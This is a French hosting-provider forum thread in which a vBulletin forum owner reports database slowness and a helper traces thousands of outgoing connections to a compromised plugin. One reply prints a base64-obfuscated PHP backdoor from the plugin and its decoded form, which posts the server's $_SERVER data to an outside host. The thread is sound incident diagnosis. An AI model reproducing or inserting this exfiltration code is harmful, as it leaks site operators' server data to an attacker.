OVH Community, votre nouvel espace communautaire.

Lenteur SQL Privé depuis ce matin ?


kevius
30/03/2016, 16h25
Et bien ! Donc un truc pas clair du tout.....

Merci pour le coup de main car là je ne m'en serai jamais sorti tout seul !!

Cela a été radical, une fois le plugin désactivé les statistiques ont immédiatement montré le retour à la normale.

MERCI !!

Ludo.H
30/03/2016, 16h12
Re,

Visiblement du hack en plus !

Dans le fichier [...]/www/forum4/dbtech/infopanels/includes/class_core.php
On peut trouver :

Code:
base64_decode('JHF1ZXJ5ID0gaHR0cF9idWlsZF9xdWVyeShhcnJheSgiZG8iID0+ICJsb2ciLCAiZGF0YSIgPT4gJF9TRVJWRVIsICJzb3VyY2VfdHlwZSIgPT4gImJhbnVzZXIiLCAic291cmNlIiA9PiAiMCIpKTsgJGZwID0gQGZzb2Nrb3Blbigid3d3LnZidWxsZXRpbi1zY3JpcHR6LmNvbSIsIDgwLCAkZXJybm8sICRlcnJzdHIsIDEwKTsgaWYgKCRmcCkgeyBmd3JpdGUoJGZwLCAiUE9TVCAvdHJhY2tlci5waHAgSFRUUC8xLjBcclxuSG9zdDogd3d3LnZidWxsZXRpbi1zY3JpcHR6LmNvbVxyXG5Vc2VyLUFnZW50OiBMdUx6VHI0Y2szclpcclxuQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuQ29udGVudC1MZW5ndGg6ICIgLiBzdHJsZW4oJHF1ZXJ5KSAuICJcclxuXHJcbiIgLiAkcXVlcnkpOyBmY2xvc2UoJGZwKTsgfQ==')
Qui une fois décoder donne :

Code:
$query = http_build_query(array("do" => "log", "data" => $_SERVER, "source_type" => "banuser", "source" => "0")); $fp = @fsockopen("www.vbulletin-scriptz.com", 80, $errno, $errstr, 10); if ($fp) { fwrite($fp, "POST /tracker.php HTTP/1.0\r\nHost: www.vbulletin-scriptz.com\r\nUser-Agent: LuLzTr4ck3rZ\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen($query) . "\r\n\r\n" . $query); fclose($fp); }
Avec www.vbulletin-scriptz.com comme @IP : 198.54.118.20, bingo !

Cdt,

kevius
30/03/2016, 16h01
Ah ! Je viens de désactiver ce plugin et miracle...... la vitesse est revenue !

Donc déjà un énorme merci pour avoir pointé le problème. Par contre pourquoi ce module fait ça aujourd'hui alors que cela fait des années qu'il est là sans poser de problème......... là est la BIG QUESTION !?

En tout cas, là cela fonctionne.

Donc mea culpa, le SAV OVH avait raison............. c'était bien un problème à mon niveau.

Ludo.H
30/03/2016, 15h49
Bonjour,

Sur le forum le dernier fichier appelé avant de sortir sur l'ip 198.54.116.20

[..]/www/forum4/dbtech/infopanels/blocks/aptlentries.php

Je ne sais pas trop ce que fait ce fichier.
Il semble que le forum soit du vbulletin, à voir dans la conf de celui-ci, si un plugin n'est pas appelé et contact l'exterieur.

Cdt,

kevius
30/03/2016, 15h16
Bonjour Ludovic,

Merci de se pencher sur mon cas désespérant !

J'ai eu le SAV au téléphone et pour eux tout va bien. C'est juste mon système qui fait trop de connexion sortantes........ sauf qu'elles ne sont pas de mon fait !

J'ai des fichiers logs bourrés de connexions sortantes (600k !) vers une adresse IP.

Il n'y a rien qui sort de mon forum pour aller à l'extérieur.

Est-ce que mon système a été hacké ?????

exemple :

[2016 Mar 29 00:00:03] [389621.961502] TCP:47410 => 192.64.113.212:80
[2016 Mar 29 00:00:04] [389622.677404] TCP:47429 => 192.64.113.212:80
[2016 Mar 29 00:00:10] [389628.289105] TCP:47517 => 192.64.113.212:80
[2016 Mar 29 00:00:10] [389628.756835] TCP:47527 => 192.64.113.212:80
[2016 Mar 29 00:00:10] [389628.760977] TCP:47528 => 192.64.113.212:80
[2016 Mar 29 00:00:10] [389628.772818] TCP:47529 => 192.64.113.212:80
pendant des lignes et des lignes....

et à un moment donné cela change d'adresse :

[2016 Mar 29 23:58:04] [475766.589613] TCP:36043 => 198.54.116.20:80
[2016 Mar 29 23:58:06] [475768.593172] TCP:36043 => 198.54.116.20:80
[2016 Mar 29 23:58:10] [475772.604290] TCP:36043 => 198.54.116.20:80
[2016 Mar 29 23:59:13] [475835.633861] TCP:36339 => 198.54.116.20:80
[2016 Mar 29 23:59:14] [475836.630183] TCP:36339 => 198.54.116.20:80
[2016 Mar 29 23:59:16] [475838.633724] TCP:36339 => 198.54.116.20:80
[2016 Mar 29 23:59:20] [475842.636861] TCP:36339 => 198.54.116.20:80

J'ai regardé ce qu'étaient ces adresses et elles vont vers les USA la Californie !?!

Ce problème d'un nombre important de connexion extérieur a visiblement commencé le 28 octobre 2015 (je le découvre aujourd'hui). Je suis passé d'un fichier log de 667 à plus de 400k ! Mais jusqu'à présent ça n'avait pas d'impact sur le temps d'accès au forum. C'est uniquement depuis hier vers 10h00 que la vitesse est devenue TRES TRES lente.

Bien entendu entre octobre 2015 et hier, je n'ai rien changé sur le forum !

Là je viens de fermer l'accès au forum pour voir quel impact cela peut avoir dans toute cette histoire.

Ce qui est TRES curieux c'est que le site, qui lui tourne sous Wordpress, n'est pas impacté ! Toutes mes bases de données sont sur le SQL Privé. Seul le forum connait un très très fort ralentissement (parfois jusqu'à 10 secondes pour afficher une page).

je ne sais pas quoi faire !!

Ludo.H
30/03/2016, 14h58
Bonjour,

Je viens de regrader.

En exécution php directe, pas très rapide, mais tolérable : (environ en moyenne 1.1 secondes)

Code:
# time php5. index.php
real	0m1.076s
user 0m0.488s
sys	0m0.032s
A distance environ 2.5 secondes:

Code:
$  time curl -L  w***.org
0.00s user 0.00s system 0% cpu 2.508 total
Il est possible d'accélérer tout cela en passant en php-fpm + php7 par exemple.

kevius
30/03/2016, 14h00
Et bah voilà on est reparti comme en 2014

Réponse à mon ticket :

Bonjour Fred,

Votre demande concerne un souci de ralentissement sur le site "xxxxxx".

D'après ces graphes, vous voyez très bien que votre site fait trop de
connexions sortantes que vous pouvez vérifier par vous même en passant par les
logs "out":

logs.ovh.net/xxxxxxx/

(S'identifier avec le nic-handel et le mot de passe).

Je vous invite à vérifier vos scripts, thème, plugins.... pour retrouver le
bon fonctionnement du site "xxxxxx".

Je reste à votre disposition pour toute demande complémentaire.

Cordialement,

Mohamed Anouar
Technicien Support IT Expert - Dysfonctionnement Web

Notre support est accessible 24h/24 , 7j/7
Nos guides : [2]https ://docs.ovh.com/
Nos maintenances :
Je vais encore devoir râler pour me faire comprendre et surtout qu'OVH accepte encore que le problème vient d'eux et non pas de mon site !

C'est intolérable !

kevius
30/03/2016, 10h04
Voilà mes stats qui montrent bien que depuis le 29 mars il y a un méchant problème !






testeur115
29/03/2016, 21h23
bah j'espère qu'avec t on ticket ils vont régler le soucis, car pareil depuis la nuit derniere pour moi

kevius
29/03/2016, 20h57
J'ai ouvert un ticket d'incident car là ça fait maintenant toute la journée que ça dure.....

J'espère vraiment que ça ne va pas faire comme en 2014 sinon je vais péter un câble !

kevius
29/03/2016, 14h43
Pour te rassurer, l'année dernière j'ai eu des lenteurs de SQL-Privé.... j'ai galéré pendant des semaines pour faire comprendre au SAV que le problème venait d'eux.

Ils commencent toujours par dire que c'est de notre faute et qu'on a un logiciel qui est mal programmé (bah oui, bien sûr ça fonctionne bien et d'un coup c'est notre logiciel qui délire.....)

Au final, ils m'ont changé de SQL et comme par miracle tout allait parfaitement jusqu'à ce matin (sans que je touche à quoique ce soit) :-O

Avec le manager v3 on avait quelques infos mais maintenant avec la v6 c'est le désert le plus complet. Donc tout ce qu'on peut faire c'est indiquer ici qu'il y a un problème sur son SQL-Privé sans pouvoir donner plus d'info.

testeur115
29/03/2016, 14h21
ah tiens je suis pas le seul a avoir des soucis de sql privé....

kevius
29/03/2016, 14h15
Bonjour,

Depuis ce matin je constate une lenteur sur mon SQL-Privé

sqlprive-gf25853-001

Est-ce qu'il y a une raison ? (travaux ?)

J'ai un forum vBulletin 4.2.3 qui tourne et depuis ce matin la page sommaire est longue à s'afficher....

Comme je ne trouve pas les outils du manager v3 sur la v6 je ne peux pas voir ce qu'il se passe.....

Peut-être qu'une personne de la team OVH pourra m'informer ?

Merci !

A+